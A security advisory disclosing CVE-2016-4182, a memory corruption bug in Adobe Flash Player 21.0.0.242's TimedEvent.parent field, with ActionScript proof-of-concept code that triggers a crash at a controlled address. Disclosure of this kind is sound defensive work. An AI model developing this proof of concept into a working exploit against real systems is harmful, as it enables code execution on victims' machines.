Adobe Flash Player TimedEvent.parent Memory Corruption Vulnerability

I. Summary Adobe Flash Player is prone to a vulnerability which leads to memory corruption because of uninitialize memory of TimedEvent.parent. ------------------------------------------------------------------ II. Description Normally, TimedEvent class should initialize the memory of its parent field. Without proper initialization, one could hijack the the memory address of parent field by construct the TimeEvent Class based on a released memory block. It is possible fake a TimedEvent Class Object via the parent field, type confused class pointer will cause code execution. The poc code trigger the crash while trying to build a TimeEvent Class by calling the contructor at 0x13371337. POC Source Code: package { import com.adobe.tvsdk.mediacore.events.TimedEvent; import com.adobe.tvsdk.mediacore.metadata.Metadata; import flash.display.Sprite; import flash.utils.ByteArray; import flash.utils.Endian; public class poc extends Sprite { public function poc() { var bytes:ByteArray = new ByteArray(); bytes.endian = Endian.LITTLE_ENDIAN; for(var i:int=0;i<0x100/4;i++) bytes.writeUnsignedInt(0x13371337); var mt:Metadata = new Metadata(); mt.setByteArray("jack", bytes); var obj:TimedEvent = new TimedEvent(0); obj.parent; } } } ------------------------------------------------------------------ III. Impact Memory Corruption ------------------------------------------------------------------ IV. Affected Adobe Flash Player 21.0.0.242. ------------------------------------------------------------------ V. Credit Wen Guanxing from Pangu LAB is credited for this vulnerability. It has been assigned as CVE-2016-4182 by Adobe: https://helpx.adobe.com/security/products/flash-player/apsb16-25.html